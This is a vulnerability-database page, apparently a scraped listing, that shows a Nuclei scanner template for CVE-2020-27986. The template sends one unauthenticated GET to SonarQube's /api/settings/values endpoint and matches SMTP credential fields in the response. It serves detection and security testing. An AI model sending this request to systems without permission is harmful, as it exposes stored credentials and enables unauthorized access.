Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-27986
HistoryJan 30, 2021 - 9:51 a.m.

SonarQube - Authentication Bypass

2021-01-3009:51:50
ProjectDiscovery
github.com
18

8.3 High

CVSS2

Attack Vector

ADJACENT_NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:A/AC:L/Au:N/C:C/I:C/A:C

8.8 High

CVSS3

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8 High

AI Score

Confidence

High

0.369 Low

EPSS

Percentile

97.2%

SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
id: CVE-2020-27986

info:
  name: SonarQube - Authentication Bypass
  author: pikpikcu
  severity: high
  description: |
    SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
    SVN, and GitLab credentials via the api/settings/values URI.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information.
  remediation: Reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
  reference:
    - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27866
    - https://github.com/SexyBeast233/SecBooks
    - https://github.com/SouthWind0/southwind0.github.io
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-27986
    cwe-id: CWE-306
    epss-score: 0.3688
    epss-percentile: 0.97174
    cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sonarsource
    product: sonarqube
  tags: cve,cve2020,sonarqube,sonarsource

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/settings/values"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - email.smtp_host.secured
          - email.smtp_password.secured
          - email.smtp_port.secured
          - email.smtp_username.secured
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cb7f58cb5673f8053ed5ad66af0605d5d46519262e62342506a7219274f0a748022100b4f6625f370ff8dbc8c5b0437ec95cee595bda01458944bcc7c1985cae793bb6:922c64590222798bb761d5b6d8e72950

8.3 High

CVSS2

Attack Vector

ADJACENT_NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:A/AC:L/Au:N/C:C/I:C/A:C

8.8 High

CVSS3

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8 High

AI Score

Confidence

High

0.369 Low

EPSS

Percentile

97.2%

Related for NUCLEI:CVE-2020-27986